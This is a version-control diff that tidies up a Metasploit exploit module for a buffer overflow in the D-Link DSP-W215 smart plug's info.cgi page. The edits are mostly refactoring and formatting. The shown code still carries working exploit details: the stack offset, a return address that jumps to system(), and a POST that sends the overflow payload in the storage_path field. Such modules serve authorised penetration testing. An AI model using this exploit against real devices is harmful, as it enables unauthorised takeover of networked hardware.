Some cleanup

2014-07-11 11:39:01 -05:00 · 2014-07-11 11:39:01 -05:00 · c55117d455
parent 109201a5da
commit c55117d455
1 changed files with 13 additions and 20 deletions
--- a/modules/exploits/linux/http/dlink_dspw215_info_cgi_rop.rb
+++ b/modules/exploits/linux/http/dlink_dspw215_info_cgi_rop.rb
@ -24,14 +24,12 @@ class Metasploit3 < Msf::Exploit::Remote
          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
        ],
      'License'        => MSF_LICENSE,
-      'Platform'       => ['linux'],
+      'Platform'       => 'linux',
      'Arch'           => ARCH_MIPSBE,
      'References'     =>
        [
-          [ 'CVE', '2014-3936' ],
-          [ 'BID', '67651' ],
-          [ 'URL', 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/' ], # blog post from Craig including PoC
-          [ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029' ]
+          ['OSVDB', '108249'],
+          ['URL', 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/'] # blog post from Craig including PoC
        ],
      'Targets'        =>
        [
@ -39,11 +37,10 @@ class Metasploit3 < Msf::Exploit::Remote
          # Automatic targeting via fingerprinting
          #
          [ 'Automatic Targeting', { 'auto' => true }  ],
-
          [ 'D-Link DSP-W215 - v1.02',
            {
-              'Offset'      => 477472,
-              'Ret'         => "\x00\x40\x5C\xEC",    # jump to system - my_cgi.cgi
+              'Offset' => 477472,
+              'Ret'    => "\x00\x40\x5C\xEC" # jump to system - my_cgi.cgi
            }
          ]
        ],
@ -57,6 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
        'uri' => "/common/info.cgi",
        'method'  => 'GET'
      })
+
      if res && [200, 301, 302].include?(res.code)

        # trying to automatically detect a vulnerable device
@ -67,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote

            self.targets.each do |t|
              if (t.name =~ /DSP-W215.*1.02/) then
-                @mytarget = t
+                @my_target = t
                break
              end
            end
@ -95,16 +93,11 @@ class Metasploit3 < Msf::Exploit::Remote
    Exploit::CheckCode::Unknown
  end

-  def target
-    return @mytarget if @mytarget
-    super
-  end
-
  def exploit
    print_status("#{peer} - Trying to access the vulnerable URL...")

    # Use a copy of the target
-    @mytarget = target
+    @my_target = target

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
@ -118,8 +111,8 @@ class Metasploit3 < Msf::Exploit::Remote
  end

  def prepare_shellcode(cmd)
-    buf = rand_text_alpha_upper(@mytarget['Offset'])   # Stack filler
-    buf << @mytarget['Ret']                            # Overwrite $ra -> jump to system
+    buf = rand_text_alpha_upper(@my_target['Offset'])   # Stack filler
+    buf << @my_target.ret                               # Overwrite $ra -> jump to system

           # la $t9, system
           # la $s1, 0x440000
@ -136,10 +129,10 @@ class Metasploit3 < Msf::Exploit::Remote

    begin
      res = send_request_cgi({
-        'method' => 'POST',
-        'uri' => "/common/info.cgi",
+        'method'        => 'POST',
+        'uri'           => "/common/info.cgi",
        'encode_params' => false,
-        'vars_post' => {
+        'vars_post'     => {
          'storage_path' => shellcode,
        }
      })